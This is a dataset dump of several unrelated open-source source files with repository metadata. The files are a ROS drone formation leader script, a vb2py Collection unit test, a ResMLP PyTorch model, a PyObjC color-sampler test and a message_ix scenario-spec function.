self.follower_all_arrived = True
self.avoid_accel = Vector3(0,0,0)
self.formation_config = 'waiting'
self.target_height_recorded = False
self.cmd = String()
self.f = 200
self.Kz = 0.5
self.local_pose_sub = rospy.Subscriber(uav_type+'_'+str(self.id)+"/mavros/local_position/pose", PoseStamped , self.local_pose_callback)
self.cmd_vel_sub = rospy.Subscriber("/xtdrone/leader/cmd_vel_flu", Twist, self.cmd_vel_callback)
self.avoid_vel_sub = rospy.Subscriber("/xtdrone/"+uav_type+'_'+str(self.id)+"/avoid_accel", Vector3, self.avoid_accel_callback)
self.leader_cmd_sub = rospy.Subscriber("/xtdrone/leader/cmd",String, self.cmd_callback)
for i in range(self.follower_num):#遍历所有跟随者
rospy.Subscriber('/xtdrone/'+uav_type+'_'+str(i+1)+'/info',String,self.followers_info_callback,i)
self.local_pose_pub = rospy.Publisher("/xtdrone/leader/pose", PoseStamped , queue_size=10)
self.formation_switch_pub = rospy.Publisher("/xtdrone/formation_switch",String, queue_size=10)
self.vel_enu_pub = rospy.Publisher('/xtdrone/'+uav_type+'_'+str(self.id)+'/cmd_vel_enu', Twist, queue_size=10)
self.cmd_pub = rospy.Publisher('/xtdrone/'+uav_type+'_'+str(self.id)+'/cmd', String, queue_size=10)
def local_pose_callback(self, msg):
self.local_pose = msg
def cmd_vel_callback(self, msg):
self.cmd_vel_enu = msg
if msg.linear.z == 0:
self.hover = True #悬停
else:
self.hover = False
def cmd_callback(self, msg):
if msg.data in formation_dict.keys():
self.formation_config = msg.data
else:
self.cmd = msg.data
def avoid_accel_callback(self, msg):
self.avoid_accel = msg
def followers_info_callback(self, msg, id):
self.followers_info[id] = msg.data
#print("follower"+str(id)+":"+ msg.data)
def loop(self):
rospy.init_node('leader')
rate = rospy.Rate(self.f)
while True:
#self.cmd_vel_enu = Twist()
for follower_info in self.followers_info:
if follower_info == "Arrived": # 一架到达
self.follower_arrived_num += 1
if self.follower_arrived_num > self.follower_num - 1:
self.follower_all_arrived = True #全部到达
if self.follower_all_arrived:
self.formation_switch_pub.publish(self.formation_config)
if self.formation_config == 'pyramid':
if not self.target_height_recorded:
target_height = self.local_pose.pose.position.z + 2
self.target_height_recorded = True
self.cmd_vel_enu.linear.z = self.Kz * (target_height - self.local_pose.pose.position.z)
self.cmd_vel_enu.linear.x += self.avoid_accel.x
self.cmd_vel_enu.linear.y += self.avoid_accel.y
self.cmd_vel_enu.linear.z += self.avoid_accel.z
self.vel_enu_pub.publish(self.cmd_vel_enu)
self.local_pose_pub.publish(self.local_pose)
self.cmd_pub.publish(self.cmd)
rate.sleep()
if __name__ == '__main__':
leader = Leader(sys.argv[1], 0, int(sys.argv[2]))
leader.loop()
|
[
"robin_shaun@foxmail.com"
] |
robin_shaun@foxmail.com
|
8766db5f17f73ece19a8e050eb0f6c2da93a0634
|
02d8a026d63127f045042e03e23acbe6c9675db8
|
/vb2py/test/testcollection.py
|
68f0506871cd8ec816e607dfee324b6b6168fe80
|
[
"BSD-3-Clause"
] |
permissive
|
VB6Hobbyst7/xl_vb2py
|
40e77976b452732575e2726fb1f0675b1ab9f86f
|
899fec0301140fd8bd313e8c80b3fa839b3f5ee4
|
refs/heads/main
| 2023-07-28T20:12:11.933183
| 2021-09-23T18:12:02
| 2021-09-23T18:12:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,618
|
py
|
from vb2py.vbclasses import Collection
import unittest
class TestCollection(unittest.TestCase):
def setUp(self):
"""Set up the test"""
self.c = Collection()
# << Collection tests >> (1 of 9)
def testAddNumeric(self):
"""testAddNumeric: should be able to add with numeric indexes"""
for i in range(10):
self.c.Add(i)
for expect, actual in zip(list(range(10)), self.c):
self.assertEqual(expect, actual)
self.assertEqual(self.c.Count(), 10)
# << Collection tests >> (2 of 9)
def testAddBeforeNumeric(self):
"""testAddBeforeNumeric: should be able to add something before something else"""
# Put 1 ... 9 in with 5 missing
for i in range(1, 10):
if i != 5:
self.c.Add(i)
self.c.Add(5, Before=5) # ie before the index 5
for expect, actual in zip(list(range(1, 10)), self.c):
self.assertEqual(expect, actual)
self.assertEqual(self.c.Count(), 9)
# << Collection tests >> (3 of 9)
def testAddAfterNumeric(self):
"""testAddAfterNumeric: should be able to add something after something else"""
# Put 1 ... 9 in with 5 missing
for i in range(1, 10):
if i != 5:
self.c.Add(i)
self.c.Add(5, After=4)
for expect, actual in zip(list(range(1, 10)), self.c):
self.assertEqual(expect, actual)
self.assertEqual(self.c.Count(), 9)
# << Collection tests >> (4 of 9)
def testAddText(self):
"""testAddText: should be able to add with text indexes"""
for i in range(10):
self.c.Add(i, "txt%d" % i)
for expect, actual in zip(list(range(10)), self.c):
self.assertEqual(expect, actual)
self.assertEqual(self.c.Count(), 10)
# << Collection tests >> (5 of 9)
def testAddTextandNumeric(self):
"""testAddTextandNumeric: should be able to add with text and numeric indexes"""
for i in range(10):
self.c.Add(i, "txt%d" % i)
self.c.Add(i)
for i in range(10):
self.assertEqual(self.c.Item("txt%d" % i), i)
self.assertEqual(self.c.Item(i*2+2), i)
self.assertEqual(self.c.Count(), 20)
# << Collection tests >> (6 of 9)
def testItemNumeric(self):
"""testItemNumeric: should be able to get with numeric indexes"""
for i in range(10):
self.c.Add(i)
for i in range(10):
self.assertEqual(i, self.c.Item(i+1))
# << Collection tests >> (7 of 9)
def testItemText(self):
"""testItemText: should be able to get with text indexes"""
for i in range(10):
self.c.Add(i, "txt%d" % i)
for i in range(10):
self.assertEqual(i, self.c.Item("txt%d" % i))
# << Collection tests >> (8 of 9)
def testRemoveNumeric(self):
"""testRemoveNumeric: should be able to remove with numeric indexes"""
for i in range(10):
self.c.Add(i+1)
self.c.Remove(5)
self.assertEqual(self.c.Count(), 9)
for i in self.c:
self.assertNotEqual(i, 5)
# << Collection tests >> (9 of 9)
def testRemoveText(self):
"""testRemoveText: should be able to remove with text indexes"""
for i in range(10):
self.c.Add(i, "txt%d" % i)
self.c.Remove("txt%d" % 5)
self.assertEqual(self.c.Count(), 9)
for i in self.c:
self.assertNotEqual(i, 5)
# -- end -- << Collection tests >>
if __name__ == "__main__":
unittest.main()
|
[
"c.git@pronovost.net"
] |
c.git@pronovost.net
|
5d4d2ed476aea05494ec90081e7dd8d67f9f8cb0
|
602ea2edb853c5561a45b6aa2783ac894ef408e4
|
/res_mlp_pytorch/res_mlp_pytorch.py
|
1ac60d23a7068840b29608111b116cc789825440
|
[
"MIT"
] |
permissive
|
BadGuy-wang/res-mlp-pytorch
|
427d6f1f2279dcfe59d7cee02befb26a0a4dad79
|
562814a406cc418bdb4710aa3bdc569206ac171b
|
refs/heads/main
| 2023-05-05T13:22:46.575901
| 2021-06-03T22:30:40
| 2021-06-03T22:30:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,989
|
py
|
import torch
from torch import nn, einsum
from einops.layers.torch import Rearrange, Reduce
# helpers
def pair(val):
return (val, val) if not isinstance(val, tuple) else val
# classes
class Affine(nn.Module):
def __init__(self, dim):
super().__init__()
self.g = nn.Parameter(torch.ones(1, 1, dim))
self.b = nn.Parameter(torch.zeros(1, 1, dim))
def forward(self, x):
return x * self.g + self.b
class PreAffinePostLayerScale(nn.Module): # https://arxiv.org/abs/2103.17239
def __init__(self, dim, depth, fn):
super().__init__()
if depth <= 18:
init_eps = 0.1
elif depth > 18 and depth <= 24:
init_eps = 1e-5
else:
init_eps = 1e-6
scale = torch.zeros(1, 1, dim).fill_(init_eps)
self.scale = nn.Parameter(scale)
self.affine = Affine(dim)
self.fn = fn
def forward(self, x):
return self.fn(self.affine(x)) * self.scale + x
def ResMLP(*, image_size, patch_size, dim, depth, num_classes, expansion_factor = 4):
image_height, image_width = pair(image_size)
assert (image_height % patch_size) == 0 and (image_width % patch_size) == 0, 'image height and width must be divisible by patch size'
num_patches = (image_height // patch_size) * (image_width // patch_size)
wrapper = lambda i, fn: PreAffinePostLayerScale(dim, i + 1, fn)
return nn.Sequential(
Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size),
nn.Linear((patch_size ** 2) * 3, dim),
*[nn.Sequential(
wrapper(i, nn.Conv1d(num_patches, num_patches, 1)),
wrapper(i, nn.Sequential(
nn.Linear(dim, dim * expansion_factor),
nn.GELU(),
nn.Linear(dim * expansion_factor, dim)
))
) for i in range(depth)],
Affine(dim),
Reduce('b n c -> b c', 'mean'),
nn.Linear(dim, num_classes)
)
|
[
"lucidrains@gmail.com"
] |
lucidrains@gmail.com
|
312b52cb1b4319add74ab61694c18b56da2451a1
|
f80ef3a3cf859b13e8af8433af549b6b1043bf6e
|
/pyobjc-framework-Cocoa/PyObjCTest/test_nscolorsampler.py
|
1b666e6faca75d95e31360218b6b1b293f053d99
|
[
"MIT"
] |
permissive
|
ronaldoussoren/pyobjc
|
29dc9ca0af838a56105a9ddd62fb38ec415f0b86
|
77b98382e52818690449111cd2e23cd469b53cf5
|
refs/heads/master
| 2023-09-01T05:15:21.814504
| 2023-06-13T20:00:17
| 2023-06-13T20:00:17
| 243,933,900
| 439
| 49
| null | 2023-06-25T02:49:07
| 2020-02-29T08:43:12
|
Python
|
UTF-8
|
Python
| false
| false
| 290
|
py
|
import AppKit
from PyObjCTools.TestSupport import TestCase, min_os_level
class TestNSColorSampler(TestCase):
@min_os_level("10.15")
def test_methods_10_15(self):
self.assertArgIsBlock(
AppKit.NSColorSampler.showSamplerWithSelectionHandler_, 0, b"v@"
)
|
[
"ronaldoussoren@mac.com"
] |
ronaldoussoren@mac.com
|
36cc0b54b41fcc7f8fe680953ecdd8685005c0bc
|
6a746abb4dd3f2e0538936f272ed5d051a120c5b
|
/message_ix_models/model/build.py
|
f92ab09a1bd72b04109c697d15c7faf224e8c6b0
|
[
"Apache-2.0"
] |
permissive
|
OFR-IIASA/message-ix-models
|
d902d26c10db8215a856032d09f4252e16500c99
|
7459065505f8f3a418086aa620b789b5c5f39cde
|
refs/heads/main
| 2023-06-15T00:16:56.654237
| 2021-07-02T09:33:49
| 2021-07-02T09:33:49
| 380,197,167
| 0
| 0
|
Apache-2.0
| 2021-06-25T10:01:47
| 2021-06-25T10:01:47
| null |
UTF-8
|
Python
| false
| false
| 4,795
|
py
|
import logging
from typing import Callable, Dict, Mapping
import pandas as pd
from ixmp.utils import maybe_check_out, maybe_commit
from message_ix import Scenario
from sdmx.model import Code
from message_ix_models.util import add_par_data, strip_par_data
from message_ix_models.util.scenarioinfo import ScenarioInfo
log = logging.getLogger(__name__)
def apply_spec(
scenario: Scenario,
spec: Mapping[str, ScenarioInfo],
data: Callable = None,
**options,
):
"""Apply `spec` to `scenario`.
Parameters
----------
spec
A 'specification': :class:`dict` with 'require', 'remove', and 'add' keys and
:class:`.ScenarioInfo` objects as values.
data : callable, optional
Function to add data to `scenario`. `data` can either manipulate the scenario
directly, or return a :class:`dict` compatible with :func:`.add_par_data`.
Other parameters
----------------
dry_run : bool
Don't modify `scenario`; only show what would be done. Default :obj:`False`.
Exceptions will still be raised if the elements from ``spec['required']`` are
missing; this serves as a check that the scenario has the required features for
applying the spec.
fast : bool
Do not remove existing parameter data; increases speed on large scenarios.
quiet : bool
Only show log messages at level ``ERROR`` and higher. If :obj:`False` (default),
show log messages at level ``DEBUG`` and higher.
message : str
Commit message.
See also
--------
.add_par_data
.strip_par_data
.Code
.ScenarioInfo
"""
dry_run = options.get("dry_run", False)
log.setLevel(logging.ERROR if options.get("quiet", False) else logging.DEBUG)
if not dry_run:
try:
scenario.remove_solution()
except ValueError:
pass
maybe_check_out(scenario)
dump: Dict[str, pd.DataFrame] = {} # Removed data
for set_name in scenario.set_list():
# Check whether this set is mentioned at all in the spec
if 0 == sum(map(lambda info: len(info.set[set_name]), spec.values())):
# Not mentioned; don't do anything
continue
log.info(f"Set {repr(set_name)}")
# Base contents of the set
base_set = scenario.set(set_name)
# Unpack a multi-dimensional/indexed set to a list of tuples
base = (
list(base_set.itertuples(index=False))
if isinstance(base_set, pd.DataFrame)
else base_set.tolist()
)
log.info(f" {len(base)} elements")
# log.debug(', '.join(map(repr, base))) # All elements; verbose
# Check for required elements
require = spec["require"].set[set_name]
log.info(f" Check {len(require)} required elements")
# Raise an exception about the first missing element
missing = list(filter(lambda e: e not in base, require))
if len(missing):
log.error(f" {len(missing)} elements not found: {repr(missing)}")
raise ValueError
# Remove elements and associated parameter values
remove = spec["remove"].set[set_name]
for element in remove:
msg = f"{repr(element)} and associated parameter elements"
if options.get("fast", False):
log.info(f" Skip removing {msg} (fast=True)")
continue
log.info(f" Remove {msg}")
strip_par_data(scenario, set_name, element, dry_run=dry_run, dump=dump)
# Add elements
add = [] if dry_run else spec["add"].set[set_name]
for element in add:
scenario.add_set(
set_name,
element.id if isinstance(element, Code) else element,
)
if len(add):
log.info(f" Add {len(add)} element(s)")
log.debug(" " + ", ".join(map(repr, add)))
log.info(" ---")
N_removed = sum(len(d) for d in dump.values())
log.info(f"{N_removed} parameter elements removed")
# Add units to the Platform before adding data
for unit in spec["add"].set["unit"]:
unit = unit if isinstance(unit, Code) else Code(id=unit, name=unit)
log.info(f"Add unit {repr(unit)}")
scenario.platform.add_unit(unit.id, comment=str(unit.name))
# Add data
if callable(data):
result = data(scenario, dry_run=dry_run)
if result:
# `data` function returned some data; use add_par_data()
add_par_data(scenario, result, dry_run=dry_run)
# Finalize
log.info("Commit results.")
maybe_commit(
scenario,
condition=not dry_run,
message=options.get("message", f"{__name__}.apply_spec()"),
)
|
[
"mail@paul.kishimoto.name"
] |
mail@paul.kishimoto.name
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.